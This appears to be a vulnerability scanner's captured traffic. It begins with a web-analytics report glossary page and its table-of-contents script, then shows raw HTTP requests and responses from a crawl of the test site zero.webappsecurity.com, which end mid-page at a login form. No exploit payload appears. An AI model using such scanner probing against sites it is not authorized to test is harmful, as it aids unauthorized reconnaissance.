<CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Glossary</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"> <!-- WT_DESCRIPTION -->Following are definitions for terms used in this report and throughout the World-Wide Web in general. These terms are also common to the WebTrends analysis tool.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P> <FONT SIZE=3 FACE="Arial" COLOR="#000000"> <!-- GLOSSARY_START --> <CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=2 ROWSPAN=1><FONT SIZE=+1 COLOR="#000000" FACE="Arial"> <!-- WT_TABLE_STATS>2,1.5,4.5</WT_TABLE_STATS --> <!-- WT_NO_COLUMN_TITLES --> <!-- WT_GLOSSARY --> <CENTER><B>Glossary</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Glossary</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ad</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A graphic or a banner on a web page that when clicked on, takes the visitor to another site.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ad Clicks</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A click on an advertisement on a web site which takes a user to another site, it is referred to as an ad click.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ad Views</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A web page that presents an ad. Once the visitor has viewed an ad, he/she can click on it (see Ad Click). There may be more than one ad on an ad view.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Authentication</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Technique by which access to Internet or Intranet resources requires the user to identify himself or herself by entering a username and password.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Bandwidth</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Measure (in kilobytes of data transferred) of the traffic on the site.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Browser</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A program used to locate and view HTML documents (Netscape, Mosaic, Microsoft Explorer, for example.)</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Click through rate</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Percentage of users who click on a viewed advertisement. This is a good indication of the effectiveness of this ad.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Client</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The browser (see above) used by a visitor to a Web site.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Client Errors</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An error occurring due to an invalid request by the visitor's browser. Client errors are in the 400-range. See "Return Code" definition.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Company Database</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The database installed and used by WebTrends to look up the company name, city, state and country corresponding to a specific domain name.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Cookies</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Persistent Client-State HTTP Cookies are files containing information about visitors to a web site (e.g., user name and preferences). This information is provided by the user during the first visit to a Web server. The server records this information in a text file and stores this file on the visitor's hard drive. When the visitor accesses the same web site again, the server looks for the cookie and configures itself based on the information provided.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Domain Name</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The text name corresponding to the numeric IP address of a computer on the Internet (i.e., www.webtrends.com).</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Domain Name Lookup</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The process of converting a numeric IP address into a text name (for example, 204.245.240.194 is converted to www.webtrends.com).</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Filters</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A means of narrowing the scope of a report or view by specifying ranges or types of data to include in or exclude.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Forms</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An HTML page which passes variables back to the server. These pages are used to gather information from users. Also referred to as scripts.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FTP</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">File Transfer Protocol is a standard method of sending files between computers over the Internet.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>GIF</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Graphics Interchange Format is an image file format commonly used in HTML documents.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Hit</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An action on the Web site, such as when a user views a page or downloads a file.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Home Page</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The main page of a Web site. The home page provides visitors with an overview and links to the rest of the site. It often contains or links to a Table of contents for the site.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Home Page URL</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The local path or Internet URL to the default page of the Web site for which WebTrends reports will be generated.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>HTML</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Hyper Text Markup Language is used to write documents for the World Wide Web to specify hypertext links between related objects and documents.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>HTTP</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Hyper Text Transfer Protocol is a standard method of transferring data between a Web <B>server</B> and a Web <B>browser</B>.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>IP Address</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Internet Protocol address identifying a computer connected to the Internet.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Log File</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A file created by a web or proxy server which contains all of the access information regarding the activity on that server.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Page Views</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Also called Page Impressions. Hit to HTML pages only (access to non-HTML documents are not counted).</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Platform</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The operating system (i.e. Windows 95, Windows NT, etc.) used by a visitor to the site.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Protocol</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An established method of exchanging data over the Internet.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Referrer</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">URL of an HTML page that refers to the site.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Return Code</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The return status of the request which specifies whether the transfer was successful and why. <DL><DT><B>Possible "Success" codes are:</B> <DD><B>200 = Success</B>: OK <DD><B>201 = Success</B>: Created <DD><B>202 = Success</B>: Accepted <DD><B>203 = Success</B>: Partial Information <DD><B>204 = Success</B>: No Response <DD><B>300 = Success</B>: Redirected <DD><B>301 = Success</B>: Moved <DD><B>302 = Success</B>: Found <DD><B>303 = Success</B>: New Method <DD><B>304 = Success</B>: Not Modified <DT><B>Possible "Failed" codes are</B>: <DD><B>400 = Failed</B>: Bad Request <DD><B>401 = Failed</B>: Unauthorized <DD><B>402 = Failed</B>: Payment Required <DD><B>403 = Failed</B>: Forbidden <DD><B>404 = Failed</B>: Not Found <DD><B>500 = Failed</B>: Internal Error <DD><B>501 = Failed</B>: Not Implemented <DD><B>502 = Failed</B>: Overloaded Temporarily <DD><B>503 = Failed</B>: Gateway Timeout</DL></TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Server</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A computer that hosts information available to anyone accessing the Internet.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Server Error</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An error occurring at the server. Web server errors have codes in the 500 range.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Spiders</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An automated program which searches the internet.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Suffix (Domain Name)</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The three digit suffix of a domain can be used to identify the type of organization. <DL><DT>Possible "Suffixes" are: <DD>.com = Commercial <DD>.edu = Educational <DD>.int = International <DD>.gov = Government <DD>.mil = Military <DD>.net = Network <DD>.org = Organization</DL></TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Agent</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Fields in an extended Web server log file identifying the browser and platform used by a visitor.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>URL</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Uniform Resource Locator is a means of identifying an exact location on the Internet. For example, http://www.webtrends.com/html/info/default.htm is the URL which defines the use of HTTP to access the Web page Default.htm in the /html/info/ directory on the WebTrends Corporation Web site). As the previous example shows, a URL is comprised of four parts: Protocol Type (HTTP), Machine Name (webtrends.com), Directory Path (/html/info/), and File Name (default.htm).</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Session</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A session of activity (all hits) for one user of a web site. A unique user is determined by the IP address or cookie. By default, a user session is terminated when a user is inactive for more than 30 minutes. This duration can be changed from General panel in the Options, Web Log Analysis dialog. Synonym: Visit.</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>View,Page</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Each request for a particular web page which displays an ad. Also referred to as an impression.</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Visit</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Commonly called User Session. All activity for one user of a web site. By default, a user session is terminated when a user is inactive for more than 30 minutes.</TD></TR> </TABLE> <!-- GLOSSARY_END --> </FONT> <!-- ----------------- ------------- --> -- ----------------- ------------- --> <!-- ----------------- ------------- --> <!-- WT_H1>MicroNetix Corporation</WT_H1 --> <!-- WT_CRLF --> <!-- WT_CENTER>This report was generated by MicroNetix Corp.</WT_CENTER --> <!-- WT_END_STRIP --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"> <CENTER> <br><br><a href="http://www.MicroNetix.com"> <img border=0 src="mlogo.gif" alt="MicroNetix Corporation"></a><P> This report was generated by <A HREF="http://www.MicroNetix.com">MicroNetix Corp</A>. </CENTER> </FONT> <BR> <BR> <html> <head> <title></title> <script LANGUAGE=JavaScript1.2> <!-- browser info object function BrowserInfo() { var agent = navigator.userAgent.toLowerCase(); this.major = parseInt(navigator.appVersion); this.minor = parseFloat(navigator.appVersion); this.ns = ((agent.indexOf('mozilla')!=-1) && ((agent.indexOf('spoofer')==-1) && (agent.indexOf('compatible') == -1))); this.ns2 = (this.ns && (this.major == 3)); this.ns3 = (this.ns && (this.major == 3)); this.ns4 = (this.ns && (this.major >= 4)); this.ie = (agent.indexOf("msie") != -1); this.ie3 = (this.ie && (this.major == 2)); this.ie4 = (this.ie && (this.major >= 4)); this.op3 = (agent.indexOf("opera") != -1); } var browserinfo = new BrowserInfo() // --> </script> <script LANGUAGE=javascript> <!-- toc data function anItem(alink,adesc) { this.alink = alink this.adesc = adesc } var VOLUMES = new Array var CHAPTERS = new Array var ITEMS = new Array var bExpanded = true; // is tree initially expanded completely var bLoaded = false; // tree is ready var width = 400; var height = 18; var MAX_ITEMS = VOLUMES.length + ITEMS.length var SPACER_HEIGHT = (MAX_ITEMS + 4) * height // allow space for toc to expand when all nodes visible var listX = 2 // start x of list var listY = 20 // start y of list var bgColor = "#FFFFFF"; if(parseInt(navigator.appVersion) < 4) { var item = 0 var alink = "" var adesc = "" with (window.document) { writeln('<body bgcolor="#FFFFFF">') writeln('<font size=3 face="Arial" color="#000000" ><b>Table of Contents</b></font>'); writeln('<BR>'); writeln('<BR>'); writeln('<table border=0 cellpadding=0 cellspacing=0>'); for (var volume = 1; volume <= (VOLUMES.length-1); volume++) { writeln('<TR>') write(' <TD colspan=2><font size=2 face="Arial"><a href="' + VOLUMES[volume].alink + '" target="CONTENT"><b>' + VOLUMES[volume].adesc + '</b></a></font></td>') writeln('</TR>') for (var chapters=1; chapters <= CHAPTERS[volume]; chapters++) { item += 1 alink = ITEMS[item].alink adesc = ITEMS[item].adesc writeln('<tr>') write(' <td valign=top><font size=1 face="Arial"><B>&nbsp;&nbsp;&nbsp;&nbsp;&#149&nbsp;</B></TD>') write(' <td><font size=1 face="Arial"><a href="' + alink + '" target="CONTENT"><b>' + adesc + '</b></a></font></td>') writeln('</tr>') } writeln('<tr>') write(' <td colspan=2><font size=2 face="Arial">&nbsp;</font></td>') writeln('</tr>') } writeln('</table>'); writeln('</body>') } } // --> </script> <script LANGUAGE=JavaScript1.2> <!-- browser info object // resize and list functions if(!window.saveInnerWidth) { window.onresize = resize; window.saveInnerWidth = window.innerWidth; window.saveInnerHeight = window.innerHeight; } function resize() { if (saveInnerWidth < window.innerWidth || saveInnerWidth > window.innerWidth || saveInnerHeight > window.innerHeight || saveInnerHeight < window.innerHeight ) { window.history.go(0); } } var _id = 0, _pid = 0, _lid = 0, _pLayer; var _mLists = new Array(); document.lists = _mLists; // adapted DevEdge Online sample code :author Michael Bostock function List(visible, width, height, bgColor) { this.setIndent = setIndent; this.addItem = addItem; this.addList = addList; this.build = build; this.rebuild = rebuild; this.setFont = _listSetFont; this._writeList = _writeList; this._showList = _showList; this._updateList = _updateList; this._updateParent = _updateParent; this.onexpand = null; this.postexpand = null; this.lists = new Array(); this.items = new Array(); this.types = new Array(); this.strs = new Array(); this.x = 0; this.y = 0; this.visible = visible; this.id = _id; this.i = 18; this.space = true; this.pid = 0; this.fontIntro = false; this.fontOutro = false; this.width = width; this.height = height; this.parLayer = false; this.built = false; this.shown = false; this.needsUpdate = false; this.needsRewrite = false; this.parent = null; this.l = 0; if(bgColor) this.bgColor = bgColor; else this.bgColor = null; _mLists[_id++] = this; } function _listSetFont(i,j) { this.fontIntro = i; this.fontOutro = j; } function setIndent(indent) { this.i = indent; if(this.i < 0) { this.i = 0; this.space = false;} this.space = false; } function setClip(layer, l, r, t, b) { if(browserinfo.ns4) { layer.clip.left = l; layer.clip.right = r; layer.clip.top = t; layer.clip.bottom = b; } else { layer.style.pixelWidth = r-l; layer.style.pixelHeight = b-t; layer.style.clip = "rect("+t+","+r+","+b+","+l+")"; } } function _writeList() { var layer, str, clip; for(var i = 0; i < this.types.length; i++) { layer = this.items[i]; if(browserinfo.ns4) layer.visibility = "hidden"; else layer.style.visibility = "hidden"; str = ""; if(browserinfo.ns4) layer.document.open(); str += "<form name=reptoc><TABLE bgcolor=#FFFFFF WIDTH="+this.width+" BORDER=0 CELLPADDING=0 CELLSPACING=0><TR>"; if(this.types[i] == "list") { str += "<TD WIDTH=15 VALIGN=MIDDLE><A HREF=\"javascript:expand("+this.lists[i].id+");\"><IMG BORDER=0 SRC=\"true.gif\" NAME=\"_img"+this.lists[i].id+"\"></A></TD>"; _pid++; } else if(this.space) str += "<TD WIDTH=15 >&nbsp;</TD>"; if(this.l>0 && this.i>0) str += "<TD WIDTH="+this.l*this.i+" >&nbsp;</TD>"; str += "<TD HEIGHT="+(this.height-3)+" WIDTH="+(this.width-15-this.l*this.i)+" VALIGN=MIDDLE ALIGN=LEFT>"; self.status = "Table of Contents: " + ITEMS[i+1].adesc if(this.fontIntro) str += this.fontIntro; str += this.strs[i]; if(this.fontOutro) str += this.fontOutro; str += "</TD></TABLE></form>"; if(browserinfo.ns4) { layer.document.writeln(str); layer.document.close(); } else layer.innerHTML = str; if(this.types[i] == "list" && this.lists[i].visible) this.lists[i]._writeList(); } this.built = true; this.needsRewrite = false; self.status = ''; } function _showList() { var layer; for(var i = 0; i < this.types.length; i++) { layer = this.items[i]; setClip(layer, 0, this.width, 0, this.height-1); if(browserinfo.ie4) { if(layer.oBgColor) layer.style.backgroundColor = layer.oBgColor; else layer.style.backgroundColor = this.bgColor; } else { if(layer.oBgColor) layer.document.bgColor = layer.oBgColor; else layer.document.bgColor = this.bgColor; } if(this.types[i] == "list" && this.lists[i].visible) this.lists[i]._showList(); } this.shown = true; this.needsUpdate = false; } function _updateList(pVis, x, y) { var currTop = y, layer; for(var i = 0; i < this.types.length; i++) { layer = this.items[i]; if(this.visible && pVis) { if(browserinfo.ns4) { layer.visibility = "visible"; layer.top = currTop; layer.left = x; } else { layer.style.visibility = "visible"; layer.style.pixelTop = currTop; layer.style.pixelLeft = x; } currTop += this.height; } else { if(browserinfo.ns4) layer.visibility = "hidden"; else layer.style.visibility = "hidden"; } if(this.types[i] == "list") { if(this.lists[i].visible) { if(!this.lists[i].built || this.lists[i].needsRewrite) this.lists[i]._writeList(); if(!this.lists[i].shown || this.lists[i].needsUpdate) this.lists[i]._showList(); if(browserinfo.ns4) layer.document.images[0].src = "true.gif"; else eval('document.images._img'+this.lists[i].id+'.src = "true.gif"'); } else { if(browserinfo.ns4) layer.document.images[0].src = "false.gif"; else eval('document.images._img'+this.lists[i].id+'.src = "false.gif"'); } if(this.lists[i].built) currTop = this.lists[i]._updateList(this.visible && pVis, x, currTop); } } return currTop; } function _updateParent(pid, l) { var layer; if(!l) l = 0; this.pid = pid; this.l = l; for(var i = 0; i < this.types.length; i++) if(this.types[i] == "list") this.lists[i]._updateParent(pid, l+1); } function expand(i) { _mLists[i].visible = !_mLists[i].visible; if(_mLists[i].onexpand != null) _mLists[i].onexpand(_mLists[i].id); _mLists[_mLists[i].pid].rebuild(); if(_mLists[i].postexpand != null) _mLists[i].postexpand(_mLists[i].id); } function build(x, y) { this._updateParent(this.id); this._writeList(); this._showList(); this._updateList(true, x, y); this.x = x; this.y = y; } function rebuild() { this._updateList(true, this.x, this.y); } function addItem(str, bgColor, layer) { var testLayer = false; if(!document.all) document.all = document.layers; if(!layer) { if(browserinfo.ie4 || !this.parLayer) testLayer = eval('document.all.lItem'+_lid); else { _pLayer = this.parLayer; testLayer = eval('_pLayer.document.layers.lItem'+_lid); } if(testLayer) layer = testLayer; else { if(browserinfo.ns4) { if(this.parLayer) layer = new Layer(this.width, this.parLayer); else layer = new Layer(this.width); } else return; } } if(bgColor) layer.oBgColor = bgColor; this.items[this.items.length] = layer; this.types[this.types.length] = "item"; this.strs[this.strs.length] = str; _lid++; } function addList(list, str, bgColor, layer) { var testLayer = false; if(!document.all) document.all = document.layers; if(!layer) { if(browserinfo.ie4 || !this.parLayer) testLayer = eval('document.all.lItem'+_lid); else { _pLayer = this.parLayer; testLayer = eval('_pLayer.document.layers.lItem'+_lid); } if(testLayer) layer = testLayer; else { if(browserinfo.ns4) { if(this.parLayer) layer = new Layer(this.width, this.parLayer); else layer = new Layer(this.width); } else return; } } if(bgColor) layer.oBgColor = bgColor; this.lists[this.items.length] = list; this.items[this.items.length] = layer; this.types[this.types.length] = "list"; this.strs[this.strs.length] = str; list.parent = this; _lid++; } document.vlinkColor = document.linkColor document.alinkColor = document.linkColor document.linkColor = document.linkColor var onit = new Image() var ofit = new Image() var cursel = new Image() onit.src = "tocarw.gif" ofit.src = "tocclr.gif" cursel.src = "tocsel.gif" var curlink = null var prvlink = null // List initialization var subvar = new Array() var image = 0 var vol = 0 var sublist = null var l = new List(true, width, height, bgColor); l.setFont("<FONT FACE='Arial' SIZE=-1'>","</FONT>"); function imgover(id){ if (browserinfo.ns4){ var objstr = "document.layers[" + id + "].document.reptoc.wt" + id img = eval(objstr) } else{ img = eval("document.wt" + id) } if (curlink && img == curlink) img.src = cursel.src else img.src = onit.src } function imgout(id){ var img if (browserinfo.ns4){ var objstr = "document.layers[" + id + "].document.reptoc.wt" + id img = eval(objstr) } else img = eval("document.wt" + id) if (curlink && img == curlink) img.src = cursel.src else img.src = ofit.src } function currentVol() { if (prvlink) prvlink.src = ofit.src } function current(id, bVolume) { if (browserinfo.ns4){ var objstr = "document.layers[" + id + "].document.reptoc.wt" + id img = eval(objstr) } else img = eval("document.wt" + id) if (img && img != curlink){ curlink = img if ( !bVolume ) curlink.src = cursel.src if (prvlink) prvlink.src = ofit.src prvlink = curlink } } function subnode(numElements){ this.list = new List(bExpanded, width, height, bgColor); this.numElements = numElements } function initsublist() { sublist = new subnode(0) sublist.list.setIndent(0); sublist.list.setFont("<FONT FACE='Arial' SIZE=-2>","</FONT>"); cursublist = sublist return sublist } function addsubitem(reportlink,reportdesc) { image++ cursublist.numElements++ cursublist.list.addItem("<nobr><img name=wt" + image + " src='tocclr.gif'><a href='" + reportlink + "' style='text-decoration:none' TARGET='CONTENT' onClick='current(" + image + ");return true;' onMouseOver='imgover(" + image + ");return true;' onMouseOut='imgout(" + image + ");return true;'>&nbsp;<font face='Arial'>" + reportdesc + "</font></A></nobr>"); } function addvolume(vollink,voldesc) { vol++ image++ l.addList(cursublist.list, "<nobr><A HREF='" + vollink + "' TARGET='CONTENT' onClick='currentVol();return true;' style='color:#000000;text-decoration:none'>" + voldesc + "</a>"); } function expandAll() { if (bLoaded) { for (var i=1; i < l.types.length +1; i++) { _mLists[i].visible = true if(_mLists[i].onexpand != null) _mLists[i].onexpand(_mLists[i].id); _mLists[_mLists[i].pid].rebuild(); if(_mLists[i].postexpand != null) _mLists[i].postexpand(_mLists[i].id); } } } function collapseAll() { if (bLoaded) { for (var i=1; i < l.types.length +1; i++) { _mLists[i].visible = false if(_mLists[i].onexpand != null) _mLists[i].onexpand(_mLists[i].id); _mLists[_mLists[i].pid].rebuild(); if(_mLists[i].postexpand != null) _mLists[i].postexpand(_mLists[i].id); } } } function init() { var item = 0 for (var volume = 1; volume <= (VOLUMES.length-1); volume++) { subvar[vol] = initsublist(); for (var chapters=1; chapters <= CHAPTERS[volume]; chapters++) { item++ subvar[vol] = addsubitem(ITEMS[item].alink, ITEMS[item].adesc) } addvolume(VOLUMES[volume].alink, VOLUMES[volume].adesc) } l.build(listX,listY); bLoaded = true } // --> </script> <script language=javascript1.2> <!-- var TOC_HTML TOC_HTML = '<style TYPE="text/css">' TOC_HTML += '#spacer {margin-top:0;position: absolute; height:' + SPACER_HEIGHT + ';z-index: 0}' TOC_HTML += 'BODY {margin-top:1; margin-left:2; background-color:#FFFFFF;}' for (var i=0; i <= MAX_ITEMS; i++) { TOC_HTML += '#lItem' + i + ' { position:absolute; }' } TOC_HTML += '</style>' TOC_HTML += '<body marginHeight=1 marginWidth=2 bgcolor="#FFFFFF" onLoad="init();">' if (browserinfo.ns4) { TOC_HTML += '<form name=frmtoc>' TOC_HTML += '<a href="javascript:expandAll();"><img width=22 height=14 name=treExp valign=top border=0 alt="Expand all sections" src="expall.gif"></a>' TOC_HTML += '<a href="javascript:collapseAll();"><img width=22 height=14 name=treCol valign=top border=0 alt="Collapse all sections" src="collall.gif"></a>' TOC_HTML += '</form>' } else { TOC_HTML += '<img style="cursor:hand" onClick="expandAll();" width=22 height=14 border=0 alt="Expand all sections" src="expall.gif">' TOC_HTML += '<img style="cursor:hand" onClick="collapseAll();" width=22 height=14 border=0 alt="Collapse all sections" src="collall.gif">' } TOC_HTML += '<div ID="spacer"></div>' for (var i=0; i <= MAX_ITEMS; i++) { TOC_HTML += '<div ID="lItem' + i + '" name="lItem' + i + '"></div>' } document.writeln( TOC_HTML ) // --> </script> </head> </HTML>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:31 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /adcenter.cgi HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:24:18 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT ETag: "f2f6c2c1a8dc11:8f6" Content-Length: 3118 <HTML> <HEAD> <TITLE>AdCenter Login Page</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF" LINK="#0000FF" VLINK="#0000FF"> <CENTER> <TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99"> <TR> <TD> <IMG SRC="http://www.heardinthehive.com/adimages/account_header.gif" WIDTH="625" HEIGHT="45" BORDER=0> </TD> </TR> </TABLE> <TABLE CELLPADDING=4 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99"> <TR> <TD> <CENTER> <iframe src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681&delivery=iframe" height=60 width=468 border=0 marginheight=0 scrolling=no marginwidth=0 frameborder=no> <a href="http://pluto.adcycle.com/go/adclick.cgi?manager=adcycle.com&id=681" target="_top"><img src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681" width=468 height=60 border=1 ALT="Click to Visit"></a> </iframe><BR> </CENTER> </TD> </TR> </TABLE> <TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0> <TR> <TD BGCOLOR="#33CC99" VALIGN="TOP"> <IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=55><BR> </TD> <TD> <IMG SRC="http://www.heardinthehive.com/adimages/top_blend.gif" WIDTH=585 HEIGHT=15><BR> <TABLE CELLPADDING=20 CELLSPACING=0 width="100%" BORDER=0> <TR> <TD BGCOLOR="#FFFFFF"> &nbsp;<BR> <FORM NAME="form1" ACTION="http://www.heardinthehive.com/cgi-bin/adcycle/adcenter.cgi" METHOD="GET"> <TABLE CELLPADDING=3 CELLSPACING=0 BORDER=0 BGCOLOR="000000"> <TR> <TD ALIGN=LEFT WIDTH=95%> <FONT FACE="VERDANA,ARIAL" SIZE=2 COLOR="WHITE"><STRONG>&nbsp;Account Login</STRONG></FONT> </TD> </TR> <TR> <TD BGCOLOR="FFFFFF"> <FONT FACE="VERDANA,ARIAL" 